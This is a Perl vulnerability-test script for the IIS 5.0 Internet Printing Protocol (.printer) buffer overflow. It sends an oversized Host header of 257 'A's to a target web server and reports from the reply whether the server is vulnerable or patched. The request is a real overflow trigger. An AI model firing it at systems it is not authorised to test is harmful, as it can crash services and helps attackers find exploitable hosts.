#!/usr/bin/perl
# By paul@moquijo.com
# Based on code by storm@stormdev.net
# Tested with sucess against Win2k IIS 5.0 (+ SP1)
# Remote Buffer Overflow Test for Internet Printing Protocol 
# This code was written after eEye brought this issue in BugTraq.


use Socket;


print "-- IPP - IIS 5.0 Vulnerability Test --\n\n";

if (not $ARGV[0]) {
	print "\tUsage: $0 <host>\n\n";
	exit;
}


$ip=$ARGV[0];

print "Sending test probe to host: " . $ip . "\n\n";
my $result=join('',sendexplt("GET /NULL.printer HTTP/1.1\n" . "Host: " . "A" x 257 . "\n\n"));

if (not $result) {
	print "The server tested has been patched for the IPP vulnerability\n\n";
	exit;
}

if ($result =~ ?HTTP/1.1 500?) {
	print "The server tested has the IPP vulnerability!\n\n";
	exit;
}

if ($result =~ ?HTTP/1.1 404?) {
	print "The server has had the .printer mapping removed.\n\n";
	exit;
}

print "An unexpected response has been received:\n";
print $result;
exit;

sub sendexplt {
        my ($pstr)=@_; 
	$target= inet_aton($ip) || die("inet_aton problems");
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,80,$target)){
                select(S);              
		$|=1;
                print $pstr;            
		my @in=<S>;
   	        select(STDOUT);
	        close(S);
                return @in;
        } else { 
		die("Can't connect...\n"); 
	}
}